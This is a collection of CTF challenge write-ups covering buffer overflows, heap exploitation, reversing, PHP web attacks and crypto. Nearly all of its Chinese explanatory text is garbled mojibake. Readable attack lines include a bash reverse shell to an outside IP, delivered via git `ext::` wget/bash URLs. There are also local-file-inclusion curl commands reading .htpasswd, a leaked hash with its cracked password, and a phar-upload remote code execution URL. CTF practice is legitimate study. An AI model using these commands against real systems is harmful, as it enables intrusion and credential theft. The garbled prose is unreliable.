Lays, freetsubasa, date
CTF{rilakkuma}
rilakkuma.jpg
Start
[BGM] https://www.youtube.com/watch?v=bBzBZJwW90g
nc ctf.pwnable.tw 8731
ๆ่ฎ 60 bytes ๅฐ stack ไธ๏ผ้ ๆ buffer overflow
ๅ
่ return address ่ทณ 0x8048087
leak stack address ๅๅ็ฌฌไบๆฌก overflow ่ทณ shellcode:
Flag: CTF{Z3r0_1s_st4rt}
Create your silver bullet !
[BGM] https://www.youtube.com/watch?v=QCTz2ie6uUg
nc ctf.pwnable.tw 4869
power_up() ไธญๅผๅซ strncat
ๆๅฏไปฅ้ ๆ overflow
strncat(bullet->desc,buf,MAX - bullet->power);
ๅ
create description ้ทๅบฆ็บ 47 ็ bullet
ๅ power_up()
1 byte ๏ผ strncat ๆๆ NULL
ๅฏซๅฐ power ็ๆไฝไฝ๏ผๅฐ power ่ฎๆ 1
ๅๅไธๆฌก power_up()
ๅฐฑๅฏไปฅไฟฎๆนๆ power ็ๅผไธฆ overflow ๅฐ main()
็ return address
ๆๅพๆ power
ๆน่ถ
ๅคงๆฎบๆญป Werewolf ๅฐฑๅฏไปฅ่งธ็ผ return
ๅ ็บๆฏ้้ strncat
้ ๆ็ overflow ๏ผrop ไธญไธ่ฝๆ NULL byte
้่ฃกๆ็ๅฉ็จๆฏ่ผ่ค้๏ผๅ
leak puts@got
๏ผๆฅ่ๅผๅซ read_int()
ๆ address ๆพๅฐ eax๏ผ
ๅ่ทณๅฐ read_int()
ไธญ้๏ผๅท่ก read(0, eax, 0x41414141)
่ฎ็ฌฌไบๆฎต ROP Chain
ๅๅ stack migration
ไธฆๅท่ก system("/bin/sh")
ๆฏ่ผ็ฐกๅฎ็ๅๆณๆ่ฉฒๆฏ leak ไนๅพ return to main
ๅๅ็ฌฌไบๆฌก overflow
Flag: CTF{Using_the_silv3r_bull3t_to_pwn_th3_w0rld}
Have you finished your howework ?
[BGM] https://www.youtube.com/watch?v=T0LfHEwEXXw
nc ctf.pwnable.tw 55688
่ทไฝๆฅญไธๆจฃ็ๆผๆด๏ผๆฐๅข note
ๆ่ผธๅ
ฅ่ฒ ๆธๅฏไปฅๆ got ไธ็ address ๆๅ note ๅ
งๅฎน
ไฝ้้กๆฏไธๅ note ๆๅคๅช่ฝๆ 8 byte ๏ผไธ่ฆๆฏ alphanumic
่งฃๆณๆฏๆฏๅท่กๅฎๅนพๅๆไปคๅพๅฐฑ jo 0x38
่ทณๅฐไธไธๅ note content ็นผ็บๅท่ก
ๅ
ๅๅบ read(0, esp, xxxx)
ๅ่ฎๅ็ฌฌไบๆฎต shellcode:
Flag: CTF{Sh3llcoding_in_th3_n0t3_ch4in}
Ref: https://www.youtube.com/watch?v=9bHibgrjNlc&list=PLTdZQWyXtB8PyKWfJyBM9TmdksIEcNRXl&index=2
Find the secret of my heart !
[BGM] https://www.youtube.com/watch?v=i4TqyI9EfzE
nc ctf.pwnable.tw 31337
heart_ctor()
ไธญๅญๅจ null-byte overflow:
ๅฏไปฅ็จไพ่ๆไธไธๅ freed chunk ็ size
ๅฉ็จๆนๅผๆฏ
ๆฐๅขไธๅ secret A
B
C
:
[A size=0x40][B size=0x110][C size=0x100]
free ๆ B
่ท A
[freed size=0x40][freed size=0x110][C size=0x100]
add ๅ A
๏ผ ้้ overflow ๆ free chunk ็ size ่ฎๅฐ๏ผไฝฟ chunk ไน้็ข็็ฉบ้
[A size=0x40][freed size=0x100][][C size=0x100]
----------------------------^^-----------------
add B'
[A size=0x40][B' size=0x90][freed size=0x70][][C size=0x100]
add D
[A size=0x40][B' size=0x90][D size=0x40][freed size=0x30][][C size=0x100]
add E
ๆ C
่ท top chunk ้้๏ผไธฆ free C
ๆญคๆ C
ๆ้้ prev_size ๆพๅฐไธไธๅ chunk ่ทไปๅ merge
๏ผ
็ฑๆผๅ้ข้ ๆ็็ฉบ้๏ผC
็ prev_size ไธฆๆฒๆ่ขซไฟฎๆน๏ผไป็ถ่ช็บไธไธๅ chunk ๆฏ B
ๅ ๆญค B
่ท C
ๆ merge ๅจไธ่ตท
้ ๆ็็ตๆๆฏ free chunk ่ท D
้็ๅจไธ่ตท:
[A size=0x40][freed size=0x210][E size=0x110]
---------------[D size=0x40]-----------------
ๆฅ่้้ malloc()
ๆฟๅฐไธญ้้ฃๅก freed chunk ๅฐฑๅฏไปฅๆงๅถ D
็ๅ
งๅฎน
ไฝๆฏ secret
chunk ไธญๅชๆฏๅญไธฒ๏ผไธฆๆฒๆ pointer ๅฏๆฟไพไฟฎๆนๅฉ็จ
ไธ้ๅฏไปฅ้
ๅ fastbin curroption
:
B
๏ผๅฉ็จ้็็ๆ
ๆณๆ D
็ size ๆนๆ 0x60
๏ผๅๆไน่ฆไฟฎๆนๅฐ D
็ไธไธๅก็ size ๏ผไฝฟๅ
ถๅฐ้ฝไธ prev_inused ็บ 1[A size=0x40][B size=0x100][freed size=0x110][E size=0x110]
--------------[D size=0x60][D' size=0x90 prev_inused=1]----
B
D
ๅฐ D
ๆพ้ฒ fastbin
:[A size=0x40][freed size=0x210][E size=0x110]
--------------[freed size=0x60]--------------
B
ไพไฟฎๆน fastbin ไธญ็ D
็ fd ๏ผไฝฟๅ
ถๆๅ list[3]
็ name:[A size=0x40][B size=0x100][freed size=0x110][E size=0x110]
---------------[freed size=0x60 fd->note_list[3].name]-----
B
list[3]
็ name ไธญ่ฃฝ้ ไธๅๅ็ fastbin chunk๏ผsize ็บ 0x60
๏ผfd ๆๅ got ไธ้ขไธ้ป็ไฝ็ฝฎ 0x601ffa
๏ผๆญค address + 8 ไธ็ dword ็บ 0x60๏ผๅ ๆญคๅฏไปฅ้้ malloc()
ๅๅบ fastbin
ๆ็ size
ๆชขๆฅadd_secret
ๆฐๅขๅ
ฉๅ size ็บ 0x60
็ chunk๏ผmalloc()
ๆ retrun ๆๅไธไธๆญฅๅฝ้ ็ fd
๏ผๆๅ secret[3].name
ไธญfree@got
ๅฏซๅฐ secret[3].secret
ไธsecret[3] show
ๅบไพๅฐฑๅฏไปฅ leak ๅบ libc address
malloc()
ไธๆฌกๆๅพๅฐไฝๆผ 0x601ffa
็ chunk๏ผๅฐฑๅฏไปฅ overwrite got๏ผfree()
ๆนๆ system()
Flag: CTF{It_just_4_s3cr3t_on_the_h34p}
Ref: http://4ngelboy.blogspot.tw/2016/03/advanced-heap-exploitation.html
Pwning for kidding !!
[BGM] https://www.youtube.com/watch?v=pn5tnyuHW3g
nc ctf.pwnable.tw 8361
ๅบ้ก่
่กจ็คบๆณๅฐๆขไฟ็่ตทไพ๏ผๆ
ไธๅ
ฌ้่งฃๆณ
ๆญค้กๅฐๆๅจๅณๅฐไธ็ท็ wargame site: pwnable.tw ่ๅคงๅฎถ่ฆ้ข !
Flag: CTF{It_is_just_4_kiddin9}
It's very crazy ! Don't do it !!
[BGM] https://www.youtube.com/watch?v=qjJFWZAirjI
nc ctf.pwnable.tw 56746
Try to decrypt the flag.
Notice: The flag doesn't include 'CTF{}' after decryption, but you must add the prefix when submitting to scoreboard.
AutoHotkey
็ข็็ๅท่กๆช
ๅพ resource ๆๅบ src:
็่ตทไพๆฏ่ท flag.enc
ๅฐๆ
ๅฏซ script ่งฃๅ flag:
Flag: CTF{l0c4l_stud3nts_n33d_b4sic_p0ints}
orange = web
orangr = ?
http://140.113.209.24:10301/orangr/index.php
ๅชๆไธๅ็ปๅ
ฅไป้ข๏ผๅฏไปฅๅพ http://140.113.209.24:10301/ ๆพๅฐ orangr.so
้ๅๅพ็ผ็พๆฏ php extension๏ผ็จไพ check login:
zif_check_user()
ไธญๅฎ็ดๆชขๆฅ username = pwn_gg
zif_check_pw()
ๆๅฐๅฏ็ขผ่ฝ็บๅคงๆธ๏ผ้้ libgmp ้ฒ่กไธ้ฃไธฒ้็ฎไธฆๆฏๅฐ็ตๆ:
ๅฐ็จๅผ้่ผฏ้ๆฐๅฏฆๅไบค็ตฆ KLEE
ๆฑๅบ mod_result
๏ผๆๅพ็ถๆ 56 ้ฒไฝ็ฎๅบๅฏ็ขผ:
username = pwn_gg
password = 22484314038774183882379870536595842641055898869375067333079702401161192138756198707377056157299919
็ปๅ
ฅๅพๅพๅฐ Flag
Flag: CTF{ORangr_ANDangr_XORangr_NOTangr}
Pure reverse ?
Notice: The flag doesn't include 'CTF{}' in this challenge but you must add the prefix when submitting to scoreboard.
tsubasa
็จๅผๆฏ็จ movfuscator ็ข็็ binary
ๅท่กๅพ้กฏ็คบ
ๅๆ movfuscator
binary ็ไธๅๆๅทงๆฏๅพๅค้จๅผๅซ้ๅง่ฟฝ๏ผ่งๅฏๅพๆ็ผ็พ็จๅผๆไธๆทๅผๅซ malloc()
็ๆธฌๅฐฑๆฏๅจ็ข็้ก็ฎๆ่ชช็ chunk๏ผๅ ๆญคๅฏซๅ so ไพ hook malloc()
ไธฆ dump ๅบๅ
งๅฎน:
ๆ็ผ็พๆฏๅ chunk size ๅคงๅฐ้ฝไธๅ๏ผไฝ้ฝๆฏ 16 ไฝ็ๅญไธฒ๏ผๅ ฑๆ 1023 ๅ chunk:
็ ง้ก็ฎๆ่ฟฐๆๅบไธฆๅๅบ็นๅฎ็ๅญๅ ็ตๆ Flag:
Flag: CTF{1ns7rum3n74710n_1s_sh4m3ful_8u7_us3ful}
I wanna play a game โฆ
nc 140.113.209.24 10003
้ฃไธๅปไนๅพ็ผ็พๆฏๅไธ็ฅ้ๅจๅนนๅ็ game:
็ถ้ๅๆ binary ๅพๅพ็ฅๆฏ่ธฉๅฐ้ท้ๆฒ
็ธฝๅ
ฑๅ็บ 9 ้๏ผๅฟ
้ ๅฐ -
็ๆ ผๅญๅกซไธๆธๅญๆๆฏ -1
ไปฃ่กจๅฐ้ทๅพๅๅณ
ๆฏ้็ๆฟ้ขๅคงๅฐ็บ height=i * 10
, width=i * 10
, ๅฐ้ทๆธ=i * 100 * i / 5
็ดๆฅๅพ็ถฒ่ทฏไธๆพไบๅ minesweeper solver ๆฅๅจไธ่ตท:
Flag: CTF{ZZZ_zzz_zZZ_Zzz_ZzZ_zZz_ZZz_zzZ}
Here is no service let you pwn, but you can pwn yourself.
hint: https://github.com/HexHive/printbf
ไธ้ฒ IDA ๆ็ผ็พๆฏไธๅจๅฑ
ๅพไพๆ นๆ hint ๅพ็ฅๆฏ printbf
็ๆ็ binary
ๅ ๆญค้ๅงๅ่ printbf
็ source code ไธฆๅ่ฉฆๅฐ binary ่ฝๅ brainfuck code:
ๅ
็จ gdb ไธญๆทๅจ 0x402C75
ไธฆ dump ๅจ 0x641868
ไธ็ program ๅ
งๅฎน
brainfuck code:
( ้่ฃก็็ฅๆๆๅพ็ 65535 ๅ <
)
้้ interpreter ๅท่กๅพๆ่ผธๅบ gg
็จๅพฎๅๆไธไธๆ็ผ็พๅจ็จๅผๆๅจ memory ไธๅฏซๅ
ฅไธไบๅผ
ไธญๆทๅจ่ฎๅ่ผธๅ
ฅๅ๏ผๅฏไปฅๅพ memory ไธญ็ผ็พๅ
ฉ็ต้ทๅบฆไธๆจฃ็ data
็ๆธฌๆฏๅฐ่ผธๅ ฅ่ๅ ถไธญไธ็ตๅ้็ฎไนๅพ่ๅฆไธ็ตๆฏๅฐ:
xor ๅพๅฐฑๅพๅฐ Flag ไบโฆ
Flag: CTF{fm7_vuln_1s_7ur1ng_c0mpl373}
Do you have dream ?
[BGM] https://www.youtube.com/watch?v=5fxPY4hi-P4
http://ctf.pwnable.tw:1412
ๆฏๅ cgi
๏ผ้ฆๅ
็ถ็ถๅ
ๆณ่พฆๆณๅพๅฐ binary๏ผๆไบไธไธ็ฎ้็ผ็พๅญๅจ http://ctf.pwnable.tw:1412/.svn
้้ๅทฅๅ ทๆไธ็ถฒ็ซๅ งๅฎน: https://github.com/kost/dvcs-ripper
grep CTF -r
ๅพๅฐ Web ้จไปฝ็ Flag: CTF{Dont_forget_subversion_in_your_dream}
ๆฅ่ๅๆ dream.cgi
:
ๅฏไปฅๅพๅฟซ็็ผ็พ take_off
ไธญๆๅๅฎ็ด็ bof๏ผ่ฝๅค ่ฆ่ main ็ return address
ๅฉ็จๆนๅผๆฏๅ
ๅ ROP
ๅผๅซ get_dream()
๏ผ่ฎ eax ๆๅๆๅ็ QUERY_STRING
๏ผ
ๅ jmp ๅฐ eax+100
ไธ็ shellcode ไพๅพๅฐๅ้ฃ shell:
ๅพๅฐ shell ไนๅพๆพๅฐ seteuid ็ binary /home/dream/get_flag
๏ผ้ๆ source code:
่ผธๅ
ฅ %6$d
ๅฐฑ่ฝ้้ format string bug leak ๅบ password
่ฎๅ flag
Flag: CTF{Y0ur_dr34m_is_so_b34ut1ul}
Decode base64 encoded ELF binary from the server.
And finish puzzles three times to capture the flag.
nc 133.130.124.59 9991
[Don't waste your time on this] https://www.youtube.com/watch?v=uuMNmHdr0Lg
Hint:
aHR0cHM6Ly91cmwuZml0L1hmVE9U
just_pepe_puzzle.jpg
้ฆๅ ๏ผhint ไธ้ปๅฑ็จ้ฝๆฒๆโฆ
ๆธฌ่ฉฆๅพๆ็ผ็พ server ๆฏไธๆฌกๅๅณ็ ELF ้ฝไธไธๆจฃ
ๅท่ก binary ๅพ็ธฝๅ
ฑๆ่ฎๅ 9 ๆฌก็่ผธๅ
ฅ๏ผๆฏๆฌก่ผธๅ
ฅ 0
~ 6
ไธญ็ 2 ๅๆธๅญ๏ผๅฟ
้ ็ฌฆๅๆขไปถ๏ผ็ธฝๅ
ฑ้่ฆ้้ 3 ๅ binary ็ check
็ดๆฅ็จ angr ่ทโฆ
Flag: CTF{5YW25a+m5pq05Yqb6Kej5aW95YOP5Lmf6Kej55qE5Ye65L6G}
Try to decode base64 encoded elf from server.
Let's oo together.
nc 133.130.124.59 9992
ไธๆจฃๆฏๆฌกๅๅณ็ binary ้ฝไธๅ๏ผ็จๅผๅ
ง้จๆ็ข็ไธๅ ๆธๅญ๏ผไธฆๅไฝ ๆฏๅคๅฐ
็ดๆฅ็จ objdump
็ฌๅบไพๅๅณๅณๅฏ:
Flag: CTF{o_oo_ooo_th1s_1s_how_simple_acg_look_like}
Try to decode base64 encoded elf from server.
And make a delicious sushi.
nc 133.130.124.59 9993
ไธๆจฃๆฏๆฌกๅๅณ็ binary ้ฝไธๅ๏ผ็จๅผๆ็ข็ไธไธฒๅญไธฒใ็ถๅพๆๅ
ฉๅ byte ๅไฝ ็ธฝๅๆฏๅคๅฐ๏ผ็ญๅฐ 20ๆฌกๅฐฑๅฏไปฅๅฏซๅ
ฅ 100 bytes ๅฐ็จๅผไธญ๏ผไธฆ่งธ็ผไธๅ gets()
็ bof
ๅทๆถ็ดๆฅ็จ angr dump ๅญไธฒ
ๆๅพๅฏซๅ
ฅ shellcode ไธฆ่ฆ่ return address๏ผ้่ฆๆณจๆ็ๆฏ bof ็ buffer size ๆฏๆฌก้ฝไธๅ:
Flag: CTF{1ife_1s_1ike_such1_as_known_as_sh1t}
http://54.199.166.146/f31c286df3608f5b71ea528d7220974957bfb14d/
header("Location: ban.php");
ไนๅพๆฒ็ตๆ
curl http://54.199.166.146/f31c286df3608f5b71ea528d7220974957bfb14d/panel.php
Flag: CTF{Admin's_pane1_1s_0n_F1r3!?!?!}
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/?source=
ๅพๅฐ source code:
http://54.199.166.146/258c634761ca928154687da257f68c5347ad68c3/?assert=highlight%5Ffile("%66lag.%70hp")
็น้้ปๅๅฎ
Flag: CTF{bypass_php_filter_is_so_fuN!}
http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/
Local File Inclusion:
curl http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/image.php?p=../admin/.htaccess
curl "http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/image.php?p=../admin/.htpasswd_which_you_should_not_know"
secret_admin:K7WeKYm8O5MQI
็จ john
็ ดๅบๆๆๅฏ็ขผ: !@#$%^&* (secret_admin)
็ปๅ
ฅ http://54.199.166.146/699e46f901f0533e28b21b4a13e27e2f7b9092a2/admin
ๅพๅฐ Flag
Flag: CTF{apache_config_file_is_sensitive}
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/
Local File Inclusion
curl http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=php://filter/convert.base64-encode/resource=index
็ผ็พๅญๅจ upload_snoopy.php
๏ผไธๅๅ็ไธๅณไป้ข
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=upload_snoopy
็ไธไธ source code:
curl http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=php://filter/convert.base64-encode/resource=upload_snoopy
upload ๅชๆชขๆฅๆชๅ็ตๅฐพๆฏ .jpg
๏ผๅฏไธๅณ phar
ไธฆ้้ include phar wrapper
ๅฏฆ็พ RCE
ๅฐ shell.php
ๆๅ
ๆ zip๏ผ้ๅฝๅ็บ shell.jpg
ๅพไธๅณ
http://54.199.198.25/1e73b9bac0d4e522b0557fad209de3f9a8197bc4/?p=phar://./images/MOVB3TIuh.jpg/shell&c=cat%20/flag
Flag: CTF{finally_got_RCE_but_do_you_have_enough_sleep?}
Do you really know GIT :P
Please HACK http://133.130.122.214/
CVE-2015-7545
cmd.txt:
bash -i > /dev/tcp/106.186.20.187/1234 0<&1 2>&1
http://133.130.122.214/?cmd=clone&url=ext::wget l4ys.tw/cmd.txt
http://133.130.122.214/?cmd=clone&url=ext::bash cmd.txt.1
Ref: https://git-scm.com/docs/git-remote-ext
Flag: CTF{Bug_bounty_really_learnable!!!Come and join us!!!}
nc csie.ctf.tw 10180
AES-OFB
็ตฆ FLAG ้้ Secret IV ไปฅๅ Secret Key ๅ ๅฏ็็ตๆ๏ผไปฅๅๆธๅ็จ็ธๅๆนๅผๅ ๅฏ็็ตๆใๆๅๅทฒ็ฅ Plaintext
ๆฏ string.letters + string.digits
ใๅ ็บ AES-OFB
็ไธฒ็ต๏ผๆไปฅ Ciphertext = Plaintext ^ AES(KEY, IV)
๏ผไนๅฐฑๆฏๆๅๅฏไปฅ้้็ๆธฌ AES(KEY, IV)
็็ตๆ๏ผไธฆ็จๆธๅ็ธๅๆนๅผๅ ๅฏ็็ตๆไพ้ฉ่ญ็ๆณ็ๆญฃ็ขบๆงใ็ถๅพๅ ็บๆฏๆฌกๅ ๅฏ็ๅญไธฒไพๆบ็ธๅ๏ผๆไปฅๅฏไปฅ้้ๅคๆฌกๆธฌ่ฉฆ๏ผไพๅฐ็ตๆไพท้ๅจๅ
ถไธญไธ็ตไธใ
Flag: CTF{$!mi14r_7o_th3_h3@0m3w@rk5?}
ๅไธ็ตๆๆ้้ไธๅๅฏ้ฐๅ ๅฏ๏ผๅฏ้้ Hastad's Broadcast Attack
่งฃๅบ
ๅพ output ๅๅบ e=7
็ n
ๅ c
๏ผ็จ CRT
็ฎๅบ Flag:
Flag: CTF{C1ll4s$!c_c0o0omm0n_m0du1u$55_a7t@ck!!!#>_<}
้้ Wireshark ๅฏไปฅ dump ๅบ server ็ SSL ๆ่ญ๏ผๆ่ญไธญๅ งๅซไปๅ ๅฏ็จ็ๅ ฌ้ฐ
ๅฐ้็ตๆธๅญไธไธ factordb.com ๅฏไปฅๅพๅฐ p ไปฅๅ q ๏ผๅ็จๅทฅๅ ทไพฟๅฏไปฅๅพๅฐ pem ๏ผๅฐ pem ไธๅ wireshark ไธญไพฟๅฏไปฅๅพๅฐ flag ไบ
Flag: CTF{F4c70rdb_m4j_h3!p_y@u_4_lo00o@ot!!*-}
้้ๅฐๅ ็ๅ งๅฎนๆๅๅฏไปฅๅพๅฐ
ๅ ็บ AES-CBC ไปฅ Block ไฝ็บๅๅฒ๏ผๆไปฅๅ
ๅพๅทฒ็ฅ็ block ้ๅง๏ผ
ไนๅฐฑๆฏ Plaintext[16:]
๏ผไปฅๅ Ciphertext[16:]
๏ผ
ๅ
ๅฐๆๆ็ key ็ตๅๆพๅบ๏ผไธฆ็จ Ciphertext[0:16]
้ฉ่ญ่ฉฒ็ตๅ็ๅฏ่ฝๆงใ
็ถๅพๅฐๆๆๅฏ่ฝ็ key ๏ผๅ่ฉฆ็จ Ciphertext[0:16]
ๆพๅบ IV ๏ผ
ไธฆๅ็จ่ฉฒ็ต (key, IV) ๅฐ FLAG ่งฃๅฏ๏ผๅพๅฐ FLAG ๆ ผๅผ็ๅณ็บ่งฃใ
Ref: https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/TMCTF/crypto/crypto200
Flag: CTF{0x52fec4c0afd8ffaebc93cbaa6}